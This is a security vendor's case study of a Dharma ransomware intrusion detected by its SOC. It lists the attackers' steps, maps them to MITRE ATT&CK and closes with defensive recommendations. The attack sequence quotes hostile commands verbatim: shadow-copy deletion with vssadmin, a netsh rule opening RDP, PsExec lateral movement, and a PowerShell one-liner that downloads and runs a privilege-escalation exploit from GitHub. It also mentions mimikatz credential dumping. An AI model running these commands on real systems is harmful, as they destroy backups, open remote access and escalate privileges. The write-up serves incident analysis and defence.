The Network: A well-known Managed Service Provider (MSP) specializing in infrastructure monitoring and management, disaster recovery, and security monitoring services uses Netsurion’s EventTracker to provide SOC-as-a-Service (SOCaaS) capabilities to their end clients. The affected end client is in the services industry.
The Expectation: Prevention defenses, such as anti-virus (AV) software, are working and comprehensive monitoring and alerting is in place to rapidly detect threats that slip through the prevention layer. EventTracker Security Information and Event Management (SIEM) services, advanced endpoint protection, and behavior analytics deliver added protection for the MSP’s clients. Rapid ransomware detection is crucial as it remains costly and time consuming to defend and mitigate.
The Catch: Detection of Dharma ransomware, a variant of the CrySIS ransomware family. The EventTracker SOC (Security Operations Center) detected malicious process hashes on the host of the MSP’s client, where these hashes matched Indicators of Compromise of Dharma ransomware. The attackers stole user credentials of the client company via a brute-force attack or by tricking the user to enter credentials on a malicious URL. The attack was initiated by logging into the system from IP address 220.127.116.11, which uninstalled the AV, followed by a series of malicious process executions and lateral movement activity through Remote Desktop Protocol (RDP). Finally, the attackers cleared audit and other system logs to try unsuccessfully to evade detection.
The Find: By combining SIEM and EDR technologies driven by our ISO-certified SOC, Netsurion detected many unknown (not seen previously) MD5 hashes where the hash reputation was poor. The detected hashes were matching to that of hashes used to launch Dharma ransomware. In use since 2016, threat actors behind Dharma ransomware continue to evolve and release new variants while using multiple attack vectors and decoy applications. Dharma ransomware leverages RDP on default port 3389 to connect to systems through stolen and compromised user credentials that allow hackers to gain access to sensitive systems and data. The cyber attackers used the tactics, techniques, and procedures (TTPs) below to infect the service industry client with ransomware.
The EventTracker SOC observed the following attack sequence on the Client host:
- Successful login to connect to system from blacklisted IP-18.104.22.168, originating from The Netherlands
- Installed of Revo Uninstaller software to uninstall the anti-virus program “Webroot SecureAnywhere”
- Installed of malicious .exe (IObitUnlocker.exe) for which the EventTracker generates new software install alert
- Downloaded malicious file in C:\Users\<compromised Username>\Downloads\..
- Used an Advanced Port Scanner to invoke mstsc.exe, to detect listening host on port 3389
- Deleted Windows backups by running the vssadmin delete shadows /all
- Downloaded many malicious files to location C:\Users\<compromised Username>\Downloads\driver
- EventTracker SIEM with built-in EDR triggered an alert upon detection of the malicious file
- Implemented critical software tools “mimilove.exe” and “mimikatz.exe” to gather password dumps
- Used netsh command through command line to allow inbound RDP connections
Command Line: netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
- Attempted to login to multiple hosts with use of remote administration tools (PsExec.exe)
Command line: C:\PS\PsExec.exe \\10.0.0.55 -u <domainname>\<Username> -p <password> cmd
- Executed PowerShell to access “github” to exploit the vulnerability in IKE and AuthIP IPsec
Command line: IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/itm4n/Ikeext-Privesc/master/Ikeext-Privesc.ps1''); Invoke-IkeextCheck -Verbose; Invoke-IkeextExploit -Verbose
- Set the Microsoft Windows firewall to an OFF state, by the use of netsh command
- Attempted to clear audit logs from the host to avoid traces of infection and to escape detection
|Tactics in MITRE ATT&CK
||Technique Name in MITRE ATT&CK
||Commands/Processes Matching the Tactics and Techniques in MITRE
||Inhibit system recovery
||vssadmin delete shadows /all
||vssadmin.exe can be used to delete all volume shadow copies on a system
||mimikatz.exe & mimilove.exe
||Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords
||Disabling security tools
||netsh can be used to disable/enable local firewall settings
||Adversaries may execute a binary, command, or script via a method that interacts with Windows services.
||Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. PowerShell can also be used to download and run executables from the internet, which can be executed from disk or in memory without touching disk.
The Fix: The EventTracker SOC promptly alerted the MSP upon the detection. All identified malicious hashes and IP addresses were immediately moved to an unsafe list for process termination on the infected system. The collected hashes were then added to the EventTracker Threat Center repository to protect other customers and MSP’s clients. The SOC analysts also assessed whether other devices on the network were also infected. The comprehensive 24/7 monitoring quickly detected the ransomware threat. Finally, mapping the actual steps taken by the threat actor to the MITRE ATT&CK framework provides a holistic view of the risk, the Dharma adversaries, and how to effectively fight against these mutating threats.
The Lesson: The EventTracker SOC provided remediation guidelines for the MSP to share with their end-user client. Recommendations to defend against ransomware attacks include:
- Organizations must implement strong password policies as well as least privilege policy (limit access to those with a true need to know)
- RDP: limit RDP access to specific IP addresses, potentially re-number the default port 3389 to try and evade scanning detection, and turn off Remote Desktop Services if they are not needed
- Educate users at all levels regarding cybersecurity best practices, especially on phishing emails and social engineered threats
- Regularly perform data backup in case information recovery is needed as a last resort
- Implement comprehensive monitoring and alerting of servers and workstations for advanced threat detection
||C:\Program Files\IObit\IObit Unlocker\IObitUnlocker.exe
||C:\Program Files\Process Hacker 2\kprocesshacker.sys